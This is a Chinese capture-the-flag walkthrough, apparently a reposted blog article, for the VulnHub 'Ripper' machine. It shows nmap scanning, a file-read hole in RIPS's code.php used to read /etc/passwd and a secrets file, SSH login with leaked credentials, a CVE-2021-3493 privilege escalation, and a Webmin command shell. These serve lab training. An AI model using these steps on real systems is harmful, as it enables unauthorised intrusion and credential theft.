靶机实战系列之Ripper靶机

admin
admin
admin
137432
文章
113
评论
2024年5月13日01:59:44评论17 views字数 2047阅读6分49秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 

靶机地址:

https://download.vulnhub.com/ripper/Ripper.ova

内容简介:
在这次打靶过程中,将使用到以下攻击手段

主机发现

端口扫描

WEB信息搜索

内部系统泄漏

代码审计

备份文件泄密

Webmin漏洞利用

Metasploit

CVE-2021-3493

 滑至文末,获取“searchall”下载链接!

1.1 主机发现

arp-scan  -l

靶机实战系列之Ripper靶机

1.2 端口扫描

nmap -p-  192.168.144.139

靶机实战系列之Ripper靶机

nmap -p22,80,10000 -sV  -A   192.168.144.138  

Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-03 01:13 EDTNmap scan report for 192.168.144.139Host is up (0.00042s latency).PORT      STATE SERVICE VERSION22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))10000/tcp open  http    MiniServ 1.910 (Webmin httpd)MAC Address: 08:00:27:3A:BA:B6 (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 43.01 seconds

发现存在webmin

1.3 web信息收集

访问 

https://192.168.144.139:10000

经过路径爬取

https://192.168.144.139:10000/robots.txt

得到这个页面

靶机实战系列之Ripper靶机

base64编码(密文)

原文

d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==

we scan php codes with rips

靶机实战系列之Ripper靶机

经过分析,该靶机存在 rips 的应用,专门用来分析php源码  

https://rips-scanner.sourceforge.net/

靶机实战系列之Ripper靶机

1.4 代码审计

访问

 http://192.168.144.139/rips/

靶机实战系列之Ripper靶机

使用此应用来分析其代码分析

输入根目录点击scan进行扫描

靶机实战系列之Ripper靶机

发现文件泄露

/var/www/html/rips/windows/code.php

靶机实战系列之Ripper靶机

尝试访问该网址

http://192.168.144.139/rips/windows/code.php?file=/var/www/html/rips/windows/code.php

靶机实战系列之Ripper靶机

可以读取该文件!

接下来指定关键字pass进行搜索 

查看 /etc/passwd

靶机实战系列之Ripper靶机

http://192.168.144.139/rips/windows/code.php?file=/var/www/html/rips/secret.php

查看得到账号ripper密码Gamespeopleplay

1.5 提权

1.5.1 CVE-2021-3493

ssh   ripper@192.168.144.139     //密码为Gamespeopleplaylsb_release   -agcc -o exp   exploit.cscp exp  ripper@192.168.144.139./exp

靶机实战系列之Ripper靶机

根据操作系统版本推断出可以使用CVE-2021-3493来进行提权

靶机实战系列之Ripper靶机

靶机实战系列之Ripper靶机

ok提权成功

1.5.2 webmin日志

找到属主是cubes当前rippper可读的文件find  / -user cubes  -type f  -exec ls -la {} ; 2>/dev/nullcat  /mnt/secret.file      // 密码为   Il00tpeople

靶机实战系列之Ripper靶机

靶机实战系列之Ripper靶机

得到密码Il00tpeople

 su  cubes    // 密码  Il00tpeoplefind  / -user cubes  -type f  -exec ls -la {} ; 2>/dev/null | grep -v "proc" | grep -v ".png"

靶机实战系列之Ripper靶机

找到日志miniser.log  

从日志里面找到了账号admin密码tokiohotel登录webmin

靶机实战系列之Ripper靶机

进入 webmin

靶机实战系列之Ripper靶机

点击 others - command shell

靶机实战系列之Ripper靶机

ok拿到权限!

靶机实战系列之Ripper靶机

注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"

靶机实战系列之Ripper靶机

原文始发于微信公众号(嗨嗨安全):靶机实战系列之Ripper靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日01:59:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机实战系列之Ripper靶机https://cn-sec.com/archives/2073789.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息